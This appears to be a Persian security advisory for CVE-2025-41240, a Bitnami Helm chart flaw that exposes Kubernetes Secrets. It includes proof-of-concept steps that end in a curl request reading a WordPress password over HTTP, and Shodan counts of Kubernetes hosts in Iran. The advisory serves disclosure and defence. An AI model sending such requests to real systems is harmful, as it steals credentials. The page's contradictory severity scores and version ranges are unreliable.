- شناسه CVE-2025-41240 :CVE
- CWE-552 :CWE
- yes :Advisory
- منتشر شده: جولای 24, 2025
- به روز شده: جولای 24, 2025
- امتیاز: 10
- نوع حمله: Unknown
- اثر گذاری: Information Disclosure
- حوزه: سیستمهای مجازیسازی و مدیریت ابری
- برند: VMWare
- محصول: bitnamicharts/appsmith
- وضعیتPublished :CVE
- No :POC
- وضعیت آسیب پذیری: patch شده
چکیده
یک آسیبپذیری بحرانی در سه چارت Bitnami Helm شناسایی شده است. این آسیب پذیری امکان دسترسی غیرمجاز به Kubernetes Secrets را از طریق مسیرهای قابلپیشبینی در root وبسرور فراهم میکند.
توضیحات
این آسیبپذیری باعث میشود Kubernetes Secrets در مسیری قابل پیشبینی بهصورت /opt/bitnami/*/secrets در دایرکتوری root وبسرور قرار گیرد (CWE-552). این مشکل در پیکربندی پیشفرض با مقدار usePasswordFiles=true رخ میدهد که در آن، Secrets بهجای متغیرهای محیطی، بهصورت فایل در فایلسیستم کانتینر نصب (mount) میشود. در صورت در دسترس بودن برنامه از طریق اینترنت، مهاجم میتواند بدون نیاز به احراز هویت یا تعامل با کاربر، با ارسال درخواست به URLهای خاص، به این فایلها دسترسی پیدا کرده و اطلاعات حساس مانند اعتبارنامهها را استخراج کند. این آسیبپذیری تاثیر قابل توجهی بر محرمانگی، یکپارچگی و در دسترسپذیری سیستم داشته و به دلیل پیچیدگی پایین حمله و امکان انجام آن از طریق شبکه, سطح ریسک بسیار بالا ارزیابی شده است. برای کاهش ریسک، بهترین راهکار بهروزرسانی به نسخههای پچشده می باشد.
CVSS
| Score | Severity | Version | Vector String |
| 10.0 | CRITICAL | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
لیست محصولات آسیب پذیر
| Versions | Product |
| affected from 21.2.0 through 22.0.4 | bitnamicharts/appsmith |
| affected from 5.2.0 before 6.0.19 | bitnamicharts/drupal |
| affected from 24.2.0 before 25.0.4 | bitnamicharts/wordpress |
لیست محصولات بروز شده
| Versions | Product |
| 22.0.4 | bitnamicharts/appsmith |
| 6.0.19 | bitnamicharts/drupal |
| 25.0.4 | bitnamicharts/wordpress |
نتیجه گیری
به کاربران توصیه میشود در اسرع وقت به نسخههای پچشده بهروزرسانی کنند. در صورتی که امکان بهروزرسانی فوری وجود ندارد، بهعنوان راهکار جایگزین میتوان مقدار گزینهی usePasswordFiles را به false تغییر داد یا دسترسی به مسیرهای مربوط به secrets را از طریق پیکربندی وبسرور یا Ingress محدود کرد.
منابع
- https://www.cve.org/CVERecord?id=CVE-2025-41240
- https://www.cvedetails.com/cve/CVE-2025-41240/
- https://github.com/bitnami/charts/security/advisories/GHSA-wgg9-9qgw-529w
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-41240
- https://vuldb.com/?id.317483
- https://nvd.nist.gov/vuln/detail/CVE-2025-41240
- https://cwe.mitre.org/data/definitions/552.html
گزارش فنی – اثبات آسیبپذیری Charts (CVE-2025-41240)
- معرفی آسیب پذیری
- شناسه : CVE-2025-41240
- ماهیت مشکل : افشای اطلاعات حساس (Sensitive Information Disclosure)
- شدت آسیبپذیری : بالا (CVSS 7.8)
- سیستمهای آسیبپذیر: استقرارهای Kubernetes که از Bitnami Helm charts استفاده میکنند.
بستههای آسیبپذیر و نسخهها:
- – نسخههای آسیبپذیر bitnamicharts/appsmith (Helm) ≥2.0، نسخههای وصلهشده 22.0.4
- – نسخههای آسیبپذیرbitnamicharts/drupal (Helm) ≥2.0، نسخههای وصلهشده 6.0.19
- – نسخههای آسیبپذیرbitnamicharts/wordpress (Helm) ≥2.0، نسخههای وصلهشده 25.0.4
- محیط آزمایش
برای بازتولید PoC، شرایط زیر توصیه میشود:
- Kubernetes با نصب چارتهای آسیبپذیر Bitnami
- فعال بودن گزینه usePasswordFiles=true در زمان استقرار
- دسترسی به URL سرویس Kubernetes
- اجرای PoC
گام 1: نصب Helm و افزودن مخزن Bitnami
ابتدا Helm را نصب کنید و مخزن Bitnami را اضافه کنید:
wget https://get.helm.sh/helm-v3.17.4-linux-amd64.tar.gz
tar -zxvf helm-v3.17.4-linux-amd64.tar.gz
sudo install linux-amd64/helm /usr/bin
گام 2: اضافه کردن مخزن Bitnami و بروزرسانی آن
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
گام 3: استقرار Kubernetes با استفاده از Helm
برای نصب چارت آسیبپذیر وردپرس، دستور زیر را وارد کنید:
helm install my-wordpress bitnami/wordpress
گام 4: بررسی وضعیت سرویس
پس از نصب چارت، وضعیت سرویس را بررسی کنید:
minikube service my-wordpress
گام 5: تست افشای اطلاعات حساس
با ارسال یک درخواست به نقطه پایانی سرویس، اطلاعات حساس ممکن است افشا شود:
curl http://<IP>:<PORT>/secrets/wordpress-password
گام 6: مشاهده خروجی
در صورت آسیبپذیری، دستور بالا ممکن است رمز عبور وردپرس را به صورت متنی ساده بازگرداند.
- نتیجه مورد انتظار
در یک سیستم امن، رمزهای عبور و اطلاعات حساس نباید از طریق درخواستهای HTTP قابل دسترسی باشند. سیستم باید از اعتبارسنجی صحیح ورودیها برای جلوگیری از افشای این اطلاعات استفاده کند.
- تحلیل فنی
آسیبپذیری CVE-2025-41240 ناشی از عدم اعتبارسنجی صحیح تنظیمات امنیتی در زمان استفاده از Bitnami Helm charts در Kubernetes است. زمانی که گزینه usePasswordFiles=true فعال باشد، اطلاعات حساس مانند رمزهای عبور پایگاه داده از طریق HTTP قابل دسترسی میشوند. این اطلاعات بدون هیچگونه احراز هویتی از طریق URL به مهاجم ارسال میشود و به راحتی قابل استخراج است.
- چارت سوءاستفاده از آسیب پذیری
در شکل زیر چارت چگونگی سوءاستفاده از این آسیب پذیری را می بینید

- رفع مشکل
برای رفع این آسیبپذیری، اقدامات زیر توصیه میشود:
- بروزرسانی چارتهای Helm به نسخههای وصلهشده:
- bitnamicharts/appsmith → 22.0.4 یا جدیدتر
- bitnamicharts/drupal → 6.0.19 یا جدیدتر
- bitnamicharts/wordpress → 25.0.4 یا جدیدتر
- غیرفعال کردن گزینه –set usePasswordFiles=true یا محدود کردن دسترسی به سرویسهای Kubernetes که حاوی اطلاعات حساس هستند.
- استفاده از رمز عبور قوی و احراز هویت صحیح برای دسترسی به این سرویسها.
- محدود کردن دسترسی به سرویسهای Kubernetes به IP های خاص یا از طریق فایروالهای امنیتی.
- منابع
https://charts.bitnami.com/bitnami
https://kubernetes.io/docs/home
https://nvd.nist.gov/vuln/detail/CVE-2025-41240
CVE-2025-41240 – Kubernetes Bitnami Helm Charts Sensitive Information Disclosure
- CVE ID: CVE-2025-41240
- Severity: High (Sensitive Information Disclosure)
- Affected Systems: Kubernetes deployments using vulnerable Bitnami Helm charts
- Affected Packages:
- bitnamicharts/appsmith (Helm) – Affected versions ≥ 21.2.0, Patched versions 22.0.4
- bitnamicharts/drupal (Helm) – Affected versions ≥ 5.2.0, Patched versions 6.0.19
- bitnamicharts/wordpress (Helm) – Affected versions ≥ 24.2.0, Patched versions 25.0.4
- Tested On: Minikube v1.34.0, kubectl v1.32.0, Helm v3.17.4
- References:
Description
A mistake in several Bitnami Helm charts lets sensitive secrets, like application or database passwords, be exposed through HTTP endpoints when you enable the option --set usePasswordFiles=true.
Attackers who have access to the service URL can obtain plaintext secrets without needing to authenticate.
Prerequisites
- Installed tools: kubectl, minikube, helm
- Test environment with Minikube. Do not test in production without applying patches.
Proof of Concept (PoC)
- Install Helm
wget https://get.helm.sh/helm-v3.17.4-linux-amd64.tar.gz tar -zxvf helm-v3.17.4-linux-amd64.tar.gz sudo install linux-amd64/helm /usr/bin/ - Add Helm repository
bash
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update - Start Minikube
bash
minikube start –force - Install vulnerable WordPress chart
bash
helm install my-wordpress wordpress - Verify service is running
bash
minikube service my-wordpress
Example output:
|———–|————–|————-|—————————|NAMESPACE NAME TARGET PORT URL default my-wordpress http/80 http://192.168.49.2:30279 https/443 http://192.168.49.2:31377 ———– ————– ————- ————————— - Check if secrets are exposed
bash
curl http://192.168.49.2:30279/secrets/wordpress-password
On vulnerable deployments, this leaks the WordPress admin password in plaintext.
— ## Expected Result – Sensitive information, such as WordPress, Drupal, and Appsmith passwords, can be accessed through unauthenticated HTTP requests on weak Helm charts.
— ## Mitigation
- Update Helm charts to the patched versions:
- bitnamicharts/appsmith → 22.0.4 or later – bitnamicharts/drupal → 6.0.19 or later
- bitnamicharts/wordpress → 25.0.4 or later – Avoid using the option –set usePasswordFiles=true unless absolutely necessary.
- Restrict external access to Kubernetes services containing secrets.
— ## Disclaimer This PoC is for educational and research purposes only. Do NOT exploit this vulnerability on systems without clear permission. The author is not responsible for any misuse or damages.
بررسی آماری آسیب پذیری CVE-2025-41240 در کشور ایران
محصول آسیب پذیر: Kubernetes
میزان استفاده در ایران بر اساس سایت های آمار مرتبط با محصول
آمار رسمی بر اساس سایت های مرتبط با محصول در دسترس نیست اما بر اساس دادههای موجود از منابع عمومی و وبسایتهای مرتبط، استفاده از پلتفرم Kubernetes در ایران در سالهای اخیر روندی رو به رشد داشته و عمدتاً در میان شرکتهای فعال در حوزه رایانش ابری، مراکز داده و سازمانهای دارای زیرساخت DevOps مشاهده میشود. وجود وبسایت تخصصی kubernetes.ir و ارائه خدمات مبتنی بر کوبرنتیز توسط شرکتهایی مانند ابر آروان، ابر زس و سایر ارائهدهندگان زیرساخت ابری داخلی، نشاندهندهی پذیرش تدریجی این فناوری در بازار فناوری اطلاعات کشور است.
میزان استفاده بر اساس سایت های دانلود ایرانی
بر اساس دادههای بهدستآمده از سایتهای دانلود و آموزش ایرانی، میزان جستوجو و دانلود مرتبط با Kubernetes در ایران بیانگر رشد قابلتوجه علاقه و آشنایی فنی کاربران با این فناوری است. پلتفرمهایی مانند P30Download و Downloadly دورههای آموزشی متعددی در زمینه کوبرنتیز منتشر کردهاند که با بازدیدهای بالا و دانلودهای قابلتوجه مواجه شدهاند، امری که نشاندهنده گسترش تقاضای آموزشی و توسعه مهارتهای مرتبط با مدیریت کانتینرها در کشور است. هرچند این دادهها مستقیماً میزان استفاده عملی از Kubernetes در زیرساختهای سازمانی را نشان نمیدهند، اما از افزایش آگاهی و پذیرش تدریجی این فناوری در جامعه فنی ایران حکایت دارند.
میزان استفاده در ایران بر اساس موتورهای جستجو (بر اساس ایندکس های گوگل در بخش tools)
| تعداد در زمان نگارش گزارش | دورک | موتور جستجو |
| 115000 | site:.ir “Kubernetes” | |
| 19800 | “کوبرنتیز” | |
| 1220000 | site:.ir “Kubernetes” | Bing |
بررسی در اسکنرهای اینترنتی
| تعداد در زمان نگارش گزارش | دورک | موتور جستجو |
| 275 (عمدتا در شیراز) | “Kubernetes” country:IR | Shodan |
وجود نمایندگی در ایران
فناوری Kubernetes بهعنوان یک پروژه متنباز تحت نظارت بنیاد Cloud Native Computing Foundation (CNCF) توسعه مییابد و دارای نمایندگی رسمی در هیچ کشوری از جمله ایران نیست. با این حال، در داخل کشور شرکتها و انجمنهای فنی متعددی بهصورت غیررسمی در زمینه استقرار، پشتیبانی و آموزش Kubernetes فعالیت میکنند. برخی ارائهدهندگان خدمات ابری ایرانی مانند ابر آروان، ابر زس و ابر دِراک، سرویسهای مبتنی بر کوبرنتیز را ارائه داده و نقش مشابه یک نماینده فنی محلی را ایفا میکنند، هرچند این همکاریها از نظر حقوقی یا سازمانی بهعنوان نمایندگی رسمی CNCF یا Kubernetes محسوب نمیشوند.
میزان استفاده بر اساس گزارشات تحقیقات بازار برای این محصول در ایران
بر اساس گزارشهای تحقیقات بازار بینالمللی و تحلیل روند فناوری در بخش فناوری اطلاعات ایران، میزان استفاده از Kubernetes در کشور در حال رشد تدریجی و متمرکز بر حوزههای ابری، مراکز داده و شرکتهای فناوری بزرگ است. هرچند تاکنون آمار رسمی یا گزارش جامع داخلی درباره سهم دقیق این فناوری در بازار ایران منتشر نشده است، اما شواهد حاصل از مطالعات جهانی و الگوهای توسعه زیرساختهای ابری نشان میدهد که سازمانهای پیشرو ایرانی بهویژه در حوزه رایانش ابری، DevOps و میزبانی سرویسها، بهصورت فزایندهای در حال بهرهگیری از Kubernetes برای استقرار و مقیاسپذیری سرویسهای خود هستند. این روند بیانگر حرکت بازار فناوری اطلاعات کشور بهسوی معماریهای cloud-native و افزایش پذیرش فناوریهای متنباز در زیرساختهای سازمانی است.
منابع
- https://www.kubernetes.ir
- https://www.arvancloud.ir/help/fa/kuber-for-beginners
- https://p30download.ir/fa/entry/109140/kubernetes-from-basics-to-advanced-with-real-world-apps
- https://downloadly.ir/elearning/video-tutorials/kubernetes-for-the-absolute-beginners-9
- https://www.researchandmarkets.com/reports/5700919/container-and-kubernetes-security-market-report?srsltid=AfmBOopVkopXn5kTuaKbrPj-dIp4RLQaDLGs9AYOWO3pDc_QdX_ggZYF
- https://portworx.com/resources/voice-of-kubernetes-expert-report
- https://www.mordorintelligence.com/industry-reports/iran-ict-market